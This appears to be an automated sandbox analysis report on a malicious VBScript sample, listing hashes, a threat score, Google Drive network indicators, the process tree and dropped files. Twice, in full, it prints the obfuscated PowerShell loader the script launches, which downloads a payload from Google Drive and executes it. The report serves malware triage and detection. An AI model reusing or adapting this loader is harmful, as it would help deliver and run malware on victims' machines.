6a872532ca240daaf8bd0b676678bfdfcad6f0c72c58f675574d3a1f471bea9f

Analysis

max time kernel
1s
max time network
48s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
18-04-2024 02:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs
Size

361KB
MD5

fe62c58bcc975e7ebbd268b44a518785
SHA1

696f215f0abe6f1513ddd0a6e8235d99fa5da7fe
SHA256

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58
SHA512

5d70692b8c4b95c61d08c07b1eff6d98ebf58692a10af71281a1fba06a94cb25102803bf1776a5546798427b7a4a76bf62bd3538ed7e7a063f27326df484cc80
SSDEEP

6144:6Q1LaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP/:bKInOiANKdGs

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

4 2424 WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

8 drive.google.com
9 drive.google.com
32 drive.google.com

flow	pid	process
4	2424	WScript.exe

flow	ioc
8	drive.google.com
9	drive.google.com
32	drive.google.com

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs"
1⤵
- Blocklisted process makes network request
PID:2424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
2⤵
PID:1364

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
3⤵
PID:2976

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
3⤵
PID:1732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
4⤵
PID:4544

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:4268

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:3176

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
PID:1444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
3KB

MD5
1a6abae036bfed2f30e7875c24c40b63

SHA1
84a2a4da8547c7e1eec081a472d35f3d504464be

SHA256
ec6443a747a05c3342830a08091bafa2dc2085ce95efd834a3080212a58d43d9

SHA512
88715349963c50cef53468eeead994d8a51ddcde8af43bd2b618849f848e754ab761a0b332b5cd0e5e14e0c01cda9c3411870803968bc489f5340fd2d04919e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
3KB

MD5
5760c01adc04e034b808ef19d37cbbc1

SHA1
a8514a2b22b3400e104585be86cca83b639e419f

SHA256
b26959c12579c3966ce4db127e98537eddee9c89792779a9861202040dd50710

SHA512
617e3cfc531d684d33713377bd46daa3db1ac2552299479aec47ff91bee7e04001495a44a3b6ab4b336e5682d81d956966e316b270d2125a168ebe81bb3793f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
3KB

MD5
1698249b445f5e2d2c6bd4d5d86031fe

SHA1
28bed2fa25235b38fc3c79695510e094450465cc

SHA256
14291d157025c70d5bf64e6ead298fe3bcfc5553c777b82014e57322f7d835d9

SHA512
ec48da21ca550a4fbd4cf92fce0f4a77b16ddca061491261c40a68b2153bf26d5a54576073b0d067b2336c44c18002c8d57551c73a7a3fe0957f6e4e3839f8da

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
389B

MD5
c1532765788a6a3fc4ad90bd18210878

SHA1
0444ee16369fbc60bd78202407597fbf4065b9b1

SHA256
5cf05d2dcc4ce288f715c18ca4862e73e2e32acf925faf58bbc8d10ab59e89ad

SHA512
280f281a45b912108f9d7b2007b1ec5d65ffe84a60cb83af92ca0927b53a15e9d5d3560a23eb7b457bc6c58899c4810a5a51657d76e226947ae0ab7abf2cdfef

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
4KB

MD5
2db91f2524cc9f80b5229ab6c3244a75

SHA1
6d84dea33beecff4dfe48d7c936400de89c8907a

SHA256
03841fc6d211e8b1e1e542af904da568cac92c4dc3fcae640a124ece12e3698c

SHA512
25709c4312c3b6ff4a7170a791c89c4e549743a8dc445b538af0cb5967595aeeb9801489db89ed45d630fe6cd916642ed8eeb4fd85161e61106b234c284d6b2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
940B

MD5
9b96937ad62ec5793d150eb46de42b6e

SHA1
5b53ad2dc24651efa824ec4073075cd0d9932707

SHA256
7e33712f0a3fee6ad2f0e4f0927e77f6c084ca3c19f9c7cc5a97c26697e73619

SHA512
520cf78a32619b8dd1eb05df3b4673ea3f394d557d84d9bb3995041c6efdf9667d31890924a502b86d83bd7e76f4aa3ba33d894aacaaadc0c6b2302829319418

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt

Filesize
2KB

MD5
7ebeb941e6c864a65fcaa40f31966257

SHA1
9e72b3cb64e5d6ed033d67c64592ce6295d84e67

SHA256
04ee80938eacc11e192685bb64529a79a69c9ddb990f4e001122693682710f16

SHA512
c7384d59968a0b7127d6269e71236c170b9401923bf8c16edb6cca80fd6c0c5a6cfce8e1de54276e8deeac653d76305789bb242bd59c745f08ed050bf77a1b44

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gaz1dsbf.ymj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Paps.Thi

Filesize
453KB

MD5
62a2406a56d4b84b4baad2d1c1a7479a

SHA1
2c08075d427f4ceba89260ef86e4469df1b5d398

SHA256
0239013ba33c599fcde5d5da6d6c31d9dd480871312edc0cafb840045da598e6

SHA512
01deccd705b9f4f5baa720c0646e1a09624fd7eb4db6ee716792ecf80c00c585a23a06ff0964bb09742f3716b5863c0c7160af7e1a9636feabcc2575d4c8a8ff

Download Submit
memory/1364-363-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-419-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1364-329-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-331-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-364-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-362-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-361-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1364-320-0x000002295C420000-0x000002295C442000-memory.dmp

Filesize
136KB

Download
memory/1364-330-0x000002295C500000-0x000002295C510000-memory.dmp

Filesize
64KB

Download
memory/1364-328-0x00007FFD7DD60000-0x00007FFD7E821000-memory.dmp

Filesize
10.8MB

Download
memory/1444-403-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-404-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-417-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-412-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-410-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-411-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-408-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-407-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
memory/1444-406-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download
